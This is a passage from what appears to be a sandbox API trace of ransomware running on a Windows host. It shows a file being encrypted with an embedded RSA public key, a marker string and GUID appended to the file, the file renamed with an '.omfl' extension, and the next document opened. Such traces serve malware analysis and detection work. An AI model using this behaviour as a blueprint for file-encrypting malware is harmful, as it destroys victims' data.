KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.845] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.845] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.846] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.846] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.846] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.846] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.846] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.846] GetLastError () returned 0x0 [0130.846] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.846] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.846] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.846] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.846] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.846] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.847] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.847] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4d80) returned 0xdd2c688 [0130.847] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.847] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd344b8 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16d88 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34500 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16da0 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16dd0 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16de8 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.847] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.847] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.847] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16dd0 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16de8 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16de8 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16dd0 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16de8 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16dd0 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.849] GetCurrentThreadId () returned 0x618 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d6700 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.849] GetCurrentThreadId () returned 0x618 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16dd0 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16de8 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16db8 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e00 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16dd0 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16dd0 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16dd0 | out: hHeap=0x4970000) returned 1 [0130.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e00 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16de8 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16db8 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16da0 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34500 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.853] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x4d7b, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x4d7b, lpOverlapped=0x0) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.853] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x4d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.853] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0130.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5d58 | out: hHeap=0x4970000) returned 1 [0130.854] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.854] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.854] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.854] CloseHandle (hObject=0x5c8) returned 1 [0130.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0130.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0130.856] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Henh.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\henh.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Henh.pps.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\henh.pps.omfl")) returned 1 [0130.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.858] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.860] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0130.860] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96395720, ftCreationTime.dwHighDateTime=0x1d5d3d6, ftLastAccessTime.dwLowDateTime=0x8685e900, ftLastAccessTime.dwHighDateTime=0x1d5dc8d, ftLastWriteTime.dwLowDateTime=0x8685e900, ftLastWriteTime.dwHighDateTime=0x1d5dc8d, nFileSizeHigh=0x0, nFileSizeLow=0x13ac8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JCLv0n1SFc.docx", cAlternateFileName="JCLV0N~1.DOC")) returned 1 [0130.860] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0130.860] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0130.860] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5d58 | out: hHeap=0x4970000) returned 1 [0130.860] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JCLv0n1SFc.docx") returned=".docx" [0130.860] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JCLv0n1SFc.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jclv0n1sfc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.860] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=80584) returned 1 [0130.860] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.863] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x13aa2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.863] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | 